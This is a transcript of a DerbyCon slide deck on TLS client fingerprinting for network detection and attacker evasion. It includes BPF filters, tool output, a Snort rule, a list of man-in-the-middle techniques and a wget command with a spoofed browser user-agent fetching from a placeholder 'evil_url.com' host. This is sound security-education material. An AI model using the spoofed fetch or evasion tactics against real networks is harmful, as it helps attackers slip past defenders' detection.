tls fingerprinting - stealthier attacking & smarter defending - derbycon

Download TLS Fingerprinting - Stealthier Attacking & Smarter Defending - DerbyCon

Post on 12-Apr-2017

1.228 views

Category:

Technology

5 download

Embed Size (px)

TRANSCRIPT

  • Stealthier Attacks & Smarter Defending

    with TLS FingerprintingLee Brotherston

    @synackpse #TLSFP

  • A Zero Math, (almost) Zero Crypto,

    TLS TalkLee Brotherston

    @synackpse #TLSFP

  • TLS PRIMER .. (Shhhh. its not a cryptographic

    algorithm)

  • Client

    Kittens..

    Unicorn Tears

    Pixie Dust

    TCP: SYN

    Server

    TCP: SYN/ACK

    TCP: ACK

  • Client Hello

    ServerClient

    Server Hello

    Client Key Exchange

    Change Cipher Spec

    Change Cipher Spec

    Encrypted Data

  • Fingerprints

  • Why Clients?

  • SSLCipherSuite RC4-SHA:AES128-SHA:HIGH:!aNULL:!MD5 SSLHonorCipherOrder on

    smtpd_tls_mandatory_ciphers = high smtpd_tls_mandatory_exclude_ciphers = aNULL, MD5 smtpd_tls_mandatory_protocols = !SSLv2, !SSLv3 smtpd_tls_mandatory_protocols = TLSv1

    ssl_cipher_list = ALL:!LOW:!SSLv2:!EXP:!aNULL

  • Origin Story

  • Expanding

  • Content Type Version Length

    Handshake Type Length Version

    RandomSession ID

    LengthSession ID

    Cipher Suites Length

    Cipher SuitesCompression

    Methods Length Compression

    MethodsExtensions

  • Content Type Version Length

    Handshake Type Length Version

    RandomSession ID

    LengthSession ID

    Cipher Suites Length

    Cipher SuitesCompression

    Methods Length Compression

    MethodsExtensions

  • Extensions

  • Significant, key - value

    order is!

  • Creating a FingerPrint

  • { "id": 0, "desc": "Dropbox (Win 8.1), "record_tls_version": 0x0301", "tls_version": 0x0301", "ciphersuite_length": 0x0010", "ciphersuite": "0xC014 0xC013 0xC011 0x0039 0x0033 0x0035 0x002F 0x00FF", "compression_length": 1", "compression": 0x00", "extensions": "0x0000 0x0023, "server_name": client-lb.dropbox.com" }

  • Deobfuscation

  • ssh -p443 user@myhost

    (dont pretend you dont)

  • Any Port Stateless

    Asymmetric Low Cost

  • tcp[tcp[12]/16*4]=22 and (tcp[tcp[12]/16*4+5]=1)

    and ((tcp[tcp[12]/16*4+9]=3) or (tcp[tcp[12]/16*4+9]=0))

    and ((tcp[tcp[12]/16*4+1]=3) or (tcp[tcp[12]/16*4+1]=0))

  • tcp[tcp[12]/16*4]=22 and (tcp[tcp[12]/16*4+5]=1) and (tcp[tcp[12]/16*4+9]=3) and (tcp[tcp[12]/16*4+1]=3)

  • Storage & Retention

  • Client toServer

    Server toClient

    FalsePositive

    Unfiltered 9547378 3776313 99.226%

    Handshake & Client Hello Filter 51766 59 2.859%

    1st Byte TLS Version 51677 3 0.005%

    1st Byte TLS Version (Record) 51677 0 0.000%

  • Moving on..

  • Own Fingerprint Modification

  • Collisions?Car & Photo: @snipeyhead

  • Yes ok no. sort of.. a bit.

    occasionally

  • Defender Level 1: Detection

  • SRC DEST192.168.1.37:3847 66.185.84.30:443192.168.1.37:44870 74.125.226.150:443192.168.1.49:36469 38.229.70.22:6667192.168.1.122:51593 54.204.30.235:2210.54.107.19:64926 194.54.103.65:2210.54.103.99:3010 54.204.30.201:44310.54.103.76:3013 64.136.25.171:8010.54.103.66:3847 192.168.10.64:2510.54.103.33:3009 54.204.30.11:44310.54.103.99:3010 192.168.10.10:443

  • Attributon: Alex PintoMLSec

  • $ sudo tcpdump -Xni eth0 host desktop

    16:29:39.149010 IP 10.54.103.76.3010 > 54.204.30.201.443: Flags [P.], seq 826:991, ack 990, win 64, options [nop,nop,TS val 1123747053 ecr 530699601], length 165 0x0000: 4500 00d9 62a9 4000 3306 586b 36af 939e E...b.@.3.Xk6... 0x0010: c0a8 0115 01bb c04d 49e3 2eec fb96 5e29 .......MI.....^) 0x0020: 8018 0040 ff69 0000 0101 080a 42fb 04ed ...@.i......B... 0x0030: 1fa1 d551 1703 0300 a008 7a4c d2cf 56e3 ...Q......zL..V. 0x0040: b83a b448 3e23 accd 3495 a547 202a e88a .:.H>#..4..G.*.. 0x0050: f05d 9f25 121a 9e1e 4944 4431 f493 0b4d .].%....IDD1...M 0x0060: e5fc c83c a77c 0cf6 6adb 96d6 7b05 481d ...

  • Probably Browsing \_()_/

  • SRC DEST192.168.1.37:3847 66.185.84.30:443192.168.1.37:44870 74.125.226.150:443192.168.1.49:36469 38.229.70.22:6667192.168.1.122:51593 54.204.30.235:2210.54.107.19:64926 194.54.103.65:2210.54.103.99:3010 54.204.30.201:44310.54.103.76:3013 64.136.25.171:8010.54.103.66:3847 192.168.10.64:2510.54.103.33:3009 54.204.30.11:44310.54.103.99:3010 192.168.10.10:443

  • SRC DEST192.168.1.37:3847 www.google.com:443192.168.1.37:44870 Unknown:443192.168.1.49:36469 FreeNode IRC:6667192.168.1.122:51593 AWS Something:2210.54.107.19:64926 Unknown:2210.54.103.99:3010 AWS Something:44310.54.103.76:3013 Unknown:8010.54.103.66:3847 Internal SMTP:2510.54.103.33:3009 AWS Something:44310.54.103.99:3010 Sharepoint:443

  • SRC DEST192.168.1.37:3847 www.google.com:443192.168.1.37:44870 Unknown:443192.168.1.49:36469 FreeNode IRC:6667192.168.1.122:51593 AWS Something:2210.54.107.19:64926 Unknown:2210.54.103.99:3010 AWS Something:44310.54.103.76:3013 Unknown:8010.54.103.66:3847 Internal SMTP:2510.54.103.33:3009 AWS Something:44310.54.103.99:3010 Sharepoint:443mitmproxy

    Tor

  • Anomaly Detection

  • Not Just Hax0ring

  • Attacker Level 1: Stealth MiTM

  • ARP Cache Poisoning

    DNS Spoofing

    BGP HijackingHacked Proxy

    Malicious Tor Node

    Local AgentMalic

    ious

    Prov

    ider

    Rogue DHCP

  • TLS Attacks

  • RealServer

    Client

    EvilServer

    TCP: SYN

    TCP: SYN/ACK

    TCP: ACK

    Client HelloHacker

  • Defender Level 2: Fingerprint

    Defined Routing

  • RealServer

    Client Defence

    HoneyPot

    TCP: SYN

    TCP: SYN/ACK

    TCP: ACK

    Client Hello

  • Attacker Level 2: AntiForensics

  • Enumerated Targets Prepared Exploits

    Delivered Stager/Phish Awaiting Callback

  • Meanwhile wget --user-agent="Mozilla/4.0

    (Windows; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)"

    https://evil_url.com/thing/

  • LegitServer

    Client

    AttackServer

    TCP: SYN

    TCP: SYN/ACK

    TCP: ACK

    Client Hello

    IE7

    wget

    Hacker

  • Defender Level 3: Fingerprint

    Canaries

  • Homogeneous Platforms

  • End Of Level Boss: Nation State

    Attackers (zomg!)

  • Honorable Mention:

    HoneyPots

  • Tools

  • FingerprinTLS$ sudo ./ssl_fingerprint/fingerprintls/fingerprintls -i en0 -s Password: Using interface: en0 Fingerprint Matched: "AppleWebKit/600.7.12" TLSv1.2 connection from 192.168.1.5:56274 to 104.244.43.39:443 Servername: "pbs.twimg.com" Fingerprint Matched: "Tor uplink" TLSv1.2 connection from 192.168.1.5:56281 to 167.114.152.100:443 Servername: "www.i6l66pzauglk2kqx2b.com" Fingerprint Matched: "Tor uplink" TLSv1.2 connection from 192.168.1.5:56280 to 37.221.162.226:9001 Servername: www.jy27vswlheykb2dptady.com" Fingerprint Matched: "mutt (tested: 1.5.23 - OS X)" TLSv1.2 connection from 192.168.1.5:56316 to 74.125.69.108:993 Servername: "Not Set Fingerprint Matched: "ThunderBird (v38.0.1 OS X)" TLSv1.2 connection from 192.168.1.5:56394 to 74.125.69.108:993 Servername: imap.gmail.com Fingerprint Matched: "AppleWebKit/600.7.12" TLSv1.2 connection from 192.168.1.5:56233 to 104.244.43.199:443 Servername: "pbs.twimg.com" Fingerprint Matched: "AppleWebKit/600.7.12" TLSv1.2 connection from 192.168.1.5:56236 to 23.195.217.14:443 Servername: "s.mzstatic.com" Fingerprint Matched: "AppleWebKit/600.7.12" TLSv1.2 connection from 192.168.1.5:56242 to 184.25.66.217:443 Servername: "itunes.apple.com" Fingerprint Matched: "AppleWebKit/600.7.12" TLSv1.2 connection from 192.168.1.5:56243 to 23.195.218.30:443 Servername: "su.itunes.apple.com" Fingerprint Matched: "AppleWebKit/600.7.12" TLSv1.2 connection from 192.168.1.5:56246 to 23.21.97.18:443 Servername: "vine.co" Fingerprint Matched: "AppleWebKit/600.7.12" TLSv1.2 connection from 192.168.1.5:56247 to 184.25.66.217:443 Servername: "init.itunes.apple.com" Fingerprint Matched: "AppleWebKit/600.7.12" TLSv1.2 connection from 192.168.1.5:56248 to 104.244.43.229:443 Servername: "v.cdn.vine.co" Fingerprint Matched: "AppleWebKit/600.7.12" TLSv1.2 connection from 192.168.1.5:56250 to 17.173.66.136:443 Servername: "xp.apple.com" Fingerprint Matched: "AppleWebKit/600.7.12" TLSv1.2 connection from 192.168.1.5:56253 to 23.195.217.14:443 Servername: "s.mzstatic.com" Fingerprint Matched: "AppleWebKit/600.7.12" TLSv1.2 connection from 192.168.1.5:56259 to 23.195.218.30:443 Servername: "se.itunes.apple.com" Fingerprint Matched: "AppleWebKit/600.7.12" TLSv1.2 connection from 192.168.1.5:56267 to 104.244.43.167:443 Servername: "pbs.twimg.com" Fingerprint Matched: "AppleWebKit/600.7.12 or 600.1.4" TLSv1.2 connection from 192.168.1.5:56273 to 104.244.43.7:443 Servername: "pbs.twimg.com"

  • { 0, "Shodan", 0x0301, 0x0302, 0x0010, {0x00,0x14,0x00,0x11,0x00,0x19,0x00,0x08, 0x00,0x06,0x00,0x17,0x00,0x03,0x00,0xFF}, 1, {0x00}, 4, {0x00,0x23,0x00,0x0F} , 0 , {} , 0 , {} , 0 , {} }

    Fingerprintout

  • alert tcp any any -> any any ( msg:"ruby script (tested: 2.0.0p481)"; content: "|16 03 01|"; offset: 0; depth: 3; rawbytes; content: "|01|"; distance: 1; rawbytes; content: "|03 01|"; distance: 3; rawbytes; byte_jump: 1,43,a